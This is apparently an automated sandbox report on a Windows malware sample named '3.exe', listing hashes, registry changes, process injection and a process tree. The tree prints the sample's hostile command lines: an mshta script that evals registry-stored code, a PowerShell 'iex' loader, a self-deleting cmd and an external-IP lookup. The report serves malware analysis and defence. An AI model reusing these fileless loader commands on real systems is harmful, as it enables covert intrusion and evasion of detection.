Analysis
-
max time kernel
150s -
max time network
120s -
platform
windows10_x64 -
resource
win10 -
submitted
13-07-2020 17:05
Static task
static1
Behavioral task
behavioral1
Sample
3.exe
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
General
-
Target
3.exe
-
Size
142KB
-
MD5
5105430437588f8878da6957bc8c3119
-
SHA1
818651e37ef71701165c3eb03c5c1813c1047b32
-
SHA256
d5ccf9039136d23649240cd3879f6e9d40dae0dff2a5cfcdefc8535f93587c38
-
SHA512
3149a53bc48feea00ce6067cf5bbe94ae5b65e933ffdd5ae4139d217c2e7e7e65fa636ab021d9a374e091a791c952e6f995e6cb923ddbfcc33d4d1e575e528b1
Malware Config
Signatures
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 3200 iexplore.exe 3200 iexplore.exe 3300 IEXPLORE.EXE 3300 IEXPLORE.EXE 3200 iexplore.exe 3200 iexplore.exe 2608 IEXPLORE.EXE 2608 IEXPLORE.EXE 3200 iexplore.exe 3200 iexplore.exe 3300 IEXPLORE.EXE 3300 IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 3200 iexplore.exe 3200 iexplore.exe 3200 iexplore.exe -
Checks whether UAC is enabled 3 IoCs
Processes:
IEXPLORE.EXEIEXPLORE.EXEiexplore.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3710004744" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0869EFC7-C52B-11EA-95F0-DED2E64E3982} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3705786422" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e0000000002000000000010660000000100002000000061f4390f7ba182c310f99a6217caabdf161b483b29ffc638222c75531edff5d2000000000e80000000020000200000002b5dfaa86984803901a3d0d116d4ea071fb5f0a9cd97f7eaff75ab6dcecbc75920000000982ad416c1493d156b15c4e3245c4a09dcbceae0faefdd2f5ca8fbbf04ff7e3a40000000bd5114363042d8de0ccdf24ad8e41bcb51fcf49897d6c222650c7f612e018d5bb515cbee830de756267a8ed8c6599743ea7873d6c8414938e2d9de2e5820689f iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7004dccd3759d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3705786422" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e0000000002000000000010660000000100002000000096da5f03eb5fdc2cb34061edb5b64d6ffa1bf1068bf4be11fcda75d9ea1f79d2000000000e80000000020000200000009e843ef9b4c1aa6b50af6bf75a56b928dd2b9ae2af771c4b56b4f2071e1aac9b200000008faa4c4c304dcc6b52cbde545f179fc67a46f715f86bdc9236e7185ff9b9f72d400000006a1ed670fd12f136ddfe1bd514faae24baba94f08a2b00ef5e16f48c1d89d13e529a39b9bf37ec9504ef61d9c7b94c406038b4fb3661e9a246fd6db33cf557bc iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824759" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824759" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a01eface3759d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824759" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
iexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exedescription pid process target process PID 3200 wrote to memory of 3300 3200 iexplore.exe IEXPLORE.EXE PID 3200 wrote to memory of 3300 3200 iexplore.exe IEXPLORE.EXE PID 3200 wrote to memory of 3300 3200 iexplore.exe IEXPLORE.EXE PID 3200 wrote to memory of 2608 3200 iexplore.exe IEXPLORE.EXE PID 3200 wrote to memory of 2608 3200 iexplore.exe IEXPLORE.EXE PID 3200 wrote to memory of 2608 3200 iexplore.exe IEXPLORE.EXE PID 2544 wrote to memory of 852 2544 mshta.exe powershell.exe PID 2544 wrote to memory of 852 2544 mshta.exe powershell.exe PID 852 wrote to memory of 1436 852 powershell.exe csc.exe PID 852 wrote to memory of 1436 852 powershell.exe csc.exe PID 1436 wrote to memory of 1640 1436 csc.exe cvtres.exe PID 1436 wrote to memory of 1640 1436 csc.exe cvtres.exe PID 852 wrote to memory of 1740 852 powershell.exe csc.exe PID 852 wrote to memory of 1740 852 powershell.exe csc.exe PID 1740 wrote to memory of 1940 1740 csc.exe cvtres.exe PID 1740 wrote to memory of 1940 1740 csc.exe cvtres.exe PID 852 wrote to memory of 2956 852 powershell.exe Explorer.EXE PID 852 wrote to memory of 2956 852 powershell.exe Explorer.EXE PID 852 wrote to memory of 2956 852 powershell.exe Explorer.EXE PID 852 wrote to memory of 2956 852 powershell.exe Explorer.EXE PID 2956 wrote to memory of 3320 2956 Explorer.EXE RuntimeBroker.exe PID 2956 wrote to memory of 3320 2956 Explorer.EXE RuntimeBroker.exe PID 2956 wrote to memory of 2480 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 2480 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 2480 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 3320 2956 Explorer.EXE RuntimeBroker.exe PID 2956 wrote to memory of 3320 2956 Explorer.EXE RuntimeBroker.exe PID 2956 wrote to memory of 3200 2956 Explorer.EXE iexplore.exe PID 2956 wrote to memory of 3200 2956 Explorer.EXE iexplore.exe PID 2956 wrote to memory of 2480 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 2480 2956 Explorer.EXE cmd.exe PID 2480 wrote to memory of 3732 2480 cmd.exe PING.EXE PID 2480 wrote to memory of 3732 2480 cmd.exe PING.EXE PID 2480 wrote to memory of 3732 2480 cmd.exe PING.EXE PID 2956 wrote to memory of 3200 2956 Explorer.EXE iexplore.exe PID 2956 wrote to memory of 3200 2956 Explorer.EXE iexplore.exe PID 2480 wrote to memory of 3732 2480 cmd.exe PING.EXE PID 2480 wrote to memory of 3732 2480 cmd.exe PING.EXE PID 2956 wrote to memory of 3528 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 3528 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 3668 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 3668 2956 Explorer.EXE cmd.exe PID 3528 wrote to memory of 3004 3528 cmd.exe nslookup.exe PID 3528 wrote to memory of 3004 3528 cmd.exe nslookup.exe PID 3668 wrote to memory of 3632 3668 cmd.exe nslookup.exe PID 3668 wrote to memory of 3632 3668 cmd.exe nslookup.exe PID 2956 wrote to memory of 2516 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 2516 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 812 2956 Explorer.EXE cmd.exe PID 2956 wrote to memory of 812 2956 Explorer.EXE cmd.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 852 set thread context of 2956 852 powershell.exe Explorer.EXE PID 2956 set thread context of 3320 2956 Explorer.EXE RuntimeBroker.exe PID 2956 set thread context of 2480 2956 Explorer.EXE cmd.exe PID 2956 set thread context of 3200 2956 Explorer.EXE iexplore.exe PID 2480 set thread context of 3732 2480 cmd.exe PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 29 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 852 powershell.exe Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE Token: SeShutdownPrivilege 2956 Explorer.EXE Token: SeCreatePagefilePrivilege 2956 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 852 powershell.exe 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2480 cmd.exe -
Suspicious behavior: EnumeratesProcesses 2263 IoCs
Processes:
powershell.exeExplorer.EXEpid process 852 powershell.exe 852 powershell.exe 852 powershell.exe 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE 2956 Explorer.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3732 PING.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
PID:2956 -
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵PID:3932
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
PID:852 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzumrato\uzumrato.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AD1.tmp" "c:\Users\Admin\AppData\Local\Temp\uzumrato\CSC4A16669EC57648A7B2916F2729FB83F8.TMP"5⤵PID:1640
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b0jcdlpk\b0jcdlpk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C39.tmp" "c:\Users\Admin\AppData\Local\Temp\b0jcdlpk\CSCAB6D30837EE24CEC81BAC8A364DB2636.TMP"5⤵PID:1940
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2480 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3732
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\25BF.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3004
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\24FF.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3632
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\25BF.bi1"2⤵PID:2516
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\24FF.bi1"2⤵PID:812
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3320
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3200 CREDAT:82945 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:3300
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3200 CREDAT:82951 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:2608
-